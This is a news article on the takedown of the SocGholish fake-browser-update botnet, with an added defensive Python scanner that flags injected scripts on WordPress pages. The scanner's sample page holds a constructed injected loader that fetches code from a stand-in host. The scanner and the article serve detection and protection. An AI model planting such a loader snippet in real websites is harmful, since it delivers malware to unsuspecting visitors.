Future Technology
Cybersecurity

Police just seized 106 servers from a botnet that ran for a decade

· 4 min read · By Nath Connell

Key takeaways

  • Authorities seized 106 servers from SocGholish, a malware operation tied to Russian cybercrime group Evil Corp
  • The takedown cleaned roughly 15,000 legitimate WordPress sites quietly hijacked to push fake browser-update malware
  • SocGholish was a front door for ransomware and data theft for years; Evil Corp has survived sanctions since 2019
  • Practical takeaway: patch WordPress and its plugins now; a Gravity SMTP flaw on around 100,000 sites is being actively exploited

A dark screen showing security and code, representing a cyber takedown

Investigators have disrupted SocGholish, one of the longest-running malware operations on the internet. They seized 106 servers and cleaned roughly 15,000 legitimate WordPress sites that had been quietly hijacked to spread it. For a threat that has been active for the better part of a decade, that is a serious dent.

How SocGholish worked

SocGholish was an initial access broker. It did not run the ransomware itself; it sold the way in. Its method was the fake browser update: you visit a normal, trusted website that has been subtly compromised, and a convincing pop-up tells you your browser needs updating. Click it, and instead of an update you download a malware loader that opens the door for whatever comes next.
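The compromise described above starts with a script the site owner never added. The following is an added illustration, not code from the article or from any of the investigators involved: a small defender-side check that a WordPress operator could run over their own rendered pages to spot script tags loading from hosts outside an allowlist, or inline scripts that build a loader tag at runtime pointing at an unknown host. The allowlist, the sample page and the `injected.example` host are all constructed for the example; the heuristics are generic and carry no indicators specific to SocGholish.

```python
"""Scan a page's HTML for scripts a site owner did not put there.

Hypothetical defender-side check, added as an illustration. A site owner
knows which hosts their pages legitimately load scripts from, so any
<script src> pointing elsewhere, or any inline script that creates a
script tag at runtime aimed at an unknown host, is worth a look.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts this (constructed) site is expected to load scripts from.
TRUSTED_SCRIPT_HOSTS = {"www.example-site.test", "cdn.example-site.test"}

# Absolute or protocol-relative URLs inside script text.
URL_RE = re.compile(r"""https?://[^\s'"<>]+|//[^\s'"<>]+""")
# Inline code that builds a <script> element on the fly.
DYNAMIC_LOADER_RE = re.compile(r"""createElement\(\s*['"]script['"]\s*\)""", re.I)
# Inline code that decodes or evaluates hidden strings.
DECODER_RE = re.compile(r"\b(eval|atob|unescape)\s*\(", re.I)


def host_of(url):
    """Return the hostname of an absolute or protocol-relative URL, else None."""
    if url.startswith("//"):
        url = "https:" + url
    return urlparse(url).hostname


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def find_suspicious_scripts(html, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Return (reason, detail) pairs for scripts that do not fit the allowlist."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = host_of(src)
        # A relative src (no host) is served by the site itself; an absolute src must be allowlisted.
        if host and host not in trusted_hosts:
            findings.append(("external script from untrusted host", src))
    for body in collector.inline:
        foreign = [u for u in URL_RE.findall(body) if host_of(u) not in trusted_hosts]
        if DYNAMIC_LOADER_RE.search(body) and foreign:
            findings.append(("inline loader fetching from untrusted host", foreign[0]))
        elif DECODER_RE.search(body):
            findings.append(("inline script decodes or evaluates hidden code", body.strip()[:60]))
    return findings


# Constructed sample page: two legitimate scripts, one harmless inline config block,
# and one injected loader of the kind a compromised site might carry.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example-site.test/jquery.min.js"></script>
<script src="/wp-includes/js/wp-embed.min.js"></script>
<script>window.__site = {"lang": "en"};</script>
<script>
var s = document.createElement('script');
s.src = 'https://injected.example/js/loader.js';
document.head.appendChild(s);
</script>
</head><body><p>Hello</p></body></html>"""

if __name__ == "__main__":
    for reason, detail in find_suspicious_scripts(SAMPLE_PAGE):
        print(f"{reason}: {detail}")
```

Run it against the HTML as a visitor actually receives it (fetch the live page, not the theme files on disk), since injections of this kind are often added to the served output rather than to the template source. Relative script paths are trusted here because they resolve to the site's own origin; a modified file under the site's own directory would still need file-integrity checks to catch.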

Those next steps were rarely small. SocGholish has been the front door for ransomware deployments, data theft and corporate espionage for years, tied to the Russian cybercrime group Evil Corp. Evil Corp has been under US Treasury sanctions since 2019, and has stayed in business by rebranding and changing tactics every time it gets hit. This takedown matters, but nobody serious is calling it a finishing blow.


Why this should land on your to-do list

Two reasons. First, those 15,000 hijacked sites were ordinary WordPress installs whose owners had no idea they were serving malware to their own visitors. If you run a site, you could be the unwitting middleman in an attack like this.

Second, the same week brought a reminder that the basics are still where most breaches start. Researchers logged 86,644 Fortinet devices with compromised credentials, with generic admin accounts and built-in system accounts making up most of them. And a patched flaw in the Gravity SMTP WordPress plugin, installed on around 100,000 sites, is being actively exploited to pull API keys and OAuth tokens.

The practical version of all this fits on a sticky note. Update WordPress and every plugin now, especially Gravity SMTP. Treat any pop-up telling you to update your browser as hostile and close the tab. Real browser updates do not arrive through a website. Takedowns make headlines, but credential hygiene and patching are what actually keep you out of the next one.